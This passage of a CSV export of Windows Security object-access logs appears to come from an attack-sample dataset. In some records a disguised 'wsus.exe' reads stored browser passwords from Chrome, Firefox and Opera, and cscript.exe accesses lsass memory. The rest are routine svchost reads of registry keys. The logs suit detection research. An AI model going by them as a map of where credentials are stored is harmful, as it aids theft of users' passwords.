C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2020-03-09T02:11:34.340693+04:00,1583705494.340693,4663,IEUser,\Device\HarddiskVolume1\Windows\System32\lsass.exe,Process,C:\Windows\System32\cscript.exe,MSEDGEWIN10,Security," + + + + + 4663 + 1 + 0 + 12802 + 0 + 0x8020000000000000 + + + 314462 + + + + + Security + MSEDGEWIN10 + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x33392 + Security + Process + \Device\HarddiskVolume1\Windows\System32\lsass.exe + 0x558 + %%4484 + + 0x10 + 0x1688 + C:\Windows\System32\cscript.exe + - + +" +1601-01-01T04:00:00+04:00,-11644473600.0,4663,IEUser,C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4991 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Local\Google\Chrome\User Data\Default\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:50.134293+04:00,1556393630.134293,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4990 + + + + + Security + IEWIN7 + 
+ + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\logins.json + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:18.699755+04:00,1556393598.699755,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4989 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Mozilla\Firefox\Profiles\kushu3sd.default\key4.db + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-04-27T23:33:05.308188+04:00,1556393585.308188,4663,IEUser,C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data,File,C:\Users\Defau1t\wsus.exe,IEWIN7,Security," + + + + + 4663 + 0 + 0 + 12800 + 0 + 0x8020000000000000 + + + 4988 + + + + + Security + IEWIN7 + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0xffa8 + Security + File + C:\Users\IEUser\AppData\Roaming\Opera Software\Opera Stable\Login Data + 0x50 + %%4416 + + 0x1 + 0x134c + C:\Users\Defau1t\wsus.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452905 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL 
SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452904 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452903 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452902 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452901 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 
+2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452900 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452899 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452898 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452897 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + 
%%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.335434+04:00,1553038515.335434,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452896 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452895 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452894 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452893 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452892 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452891 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452890 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452889 + + + + + Security + PC01.example.corp + + + + + 
S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452888 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x1ac + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452887 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452886 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + 
+ + 452885 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x420 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452884 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452883 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452882 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL 
SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452881 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452880 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452879 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452878 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" 
+2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452877 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452876 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452875 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452874 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + 
%%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452873 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452872 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452871 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452870 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + 
\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452869 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452868 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa + 0x468 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452867 + + + + + Security + PC01.example.corp + + + + + S-1-5-19 + LOCAL SERVICE + NT AUTHORITY + 0x3e5 + Security + Key + \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy + 0x520 + %%4432 + + 0x1 + 0x5a8 + C:\Windows\System32\svchost.exe + +" +2019-03-20T03:35:15.325419+04:00,1553038515.325419,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security," + + + + + 4663 + 0 + 0 + 12801 + 0 + 0x8020000000000000 + + + 452866 + + + + + Security + PC01.example.corp + + + + + 
